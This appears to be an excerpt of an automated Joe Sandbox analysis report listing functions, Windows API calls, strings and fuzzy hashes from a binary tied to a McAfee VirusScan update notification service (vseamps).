                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                        • Instruction ID: 30ea2a9775190e9d0a7abad356b8981684c8d2552a67def043a4f5008471f38a
                                                                                        • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                        • Instruction Fuzzy Hash: 1A216F24B0CE4289FA69A36355911796163AF46FB0F1407F7E93E47AF6EE6CB4418240
                                                                                        Function 00007FFE1A520100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                        • String ID: CONOUT$
                                                                                        • API String ID: 3230265001-3130406586
                                                                                        • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                        • Instruction ID: 22a65687c932797a1dd63702ae1da1b25bf2878d2e8631af4845515c2a202a38
                                                                                        • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                        • Instruction Fuzzy Hash: C9119A32B1CE41C2E3508B93A84473962A2BB89FF4F5002B7EA5D87BA4DF3CD9048744
                                                                                        Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                                        • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                          • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                          • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                                                          • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                                                          • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                                                          • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                                                          • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                                                          • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                                                          • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                                                          • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                                                          • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                                                          • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                                                        • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                                                        • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                                                          • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                                                          • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                                                          • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                                                          • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                                                          • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                                                          • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                                                          • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                                                          • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                                                          • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                                                          • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                                                          • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                                                          • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                                                          • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                                                          • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                                                          • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                                                          • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                                                          • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                                                        • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                                                        • String ID: vseamps
                                                                                        • API String ID: 3197017603-3944098904
                                                                                        • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                        • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                                                        • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                                                        • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                                                        Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Messagesprintf_s
                                                                                        • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                                                        • API String ID: 2642950106-3610746849
                                                                                        • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                        • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                                                        • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                                                        • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                                                        Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                        • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                                                        • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                                                        • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                                                        Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                        • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                                                        • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                                                        • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                                                        Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                                                        • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 319667368-0
                                                                                        • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                        • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                                        • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                        • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                                        Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                          • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                                        • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                                        • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 1390108997-0
                                                                                        • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                        • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                                        • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                        • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                                        Function 00007FFE1A514CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 3523768491-393685449
                                                                                        • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                        • Instruction ID: 0617e5b028956466e08e3a571b01e219ec4ebd4f1838f5efbf8982716a2d8bad
                                                                                        • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                        • Instruction Fuzzy Hash: C4E1C472B0CB828AE7519F36D4402BD3BB1FB46B68F1411B6DA8D57666DF38E481C700
                                                                                        Function 00007FFE1A5195BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A5195CB
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519601
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51962E
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51963F
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A519650
                                                                                        • SetLastError.KERNEL32(?,?,?,00007FFE1A518BC9,?,?,?,?,00007FFE1A518C14), ref: 00007FFE1A51966B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                        • Instruction ID: 294ecd9cbcfe1625919d203323795a2e890604e5968f0c1276960b53027c7311
                                                                                        • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                        • Instruction Fuzzy Hash: F1115C24B0CE4286FA546363559117921639F46FF0F8447F7E83E866F6DE2CA4418210
                                                                                        Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 3326452711-0
                                                                                        • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                        • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                                        • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                        • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                                        Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                        • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                                        • API String ID: 2984211723-1229430080
                                                                                        • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                        • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                                        • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                        • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                                        Function 00007FFE1A517F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                        • Instruction ID: cc6e9927e9ae361ad265774bd4d681b0ad353e873e8847fb938c48f3df052600
                                                                                        • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                        • Instruction Fuzzy Hash: 05F0446571DE06C1EB104B65A44477A6322AF46FB1F5402F7D55D451F4DF3CD045C740
                                                                                        Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                                        • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                                        • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 75539706-1276376045
                                                                                        • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                        • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                                        • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                        • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                                        Function 00007FFE1A5140D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustPointer
                                                                                        • String ID:
                                                                                        • API String ID: 1740715915-0
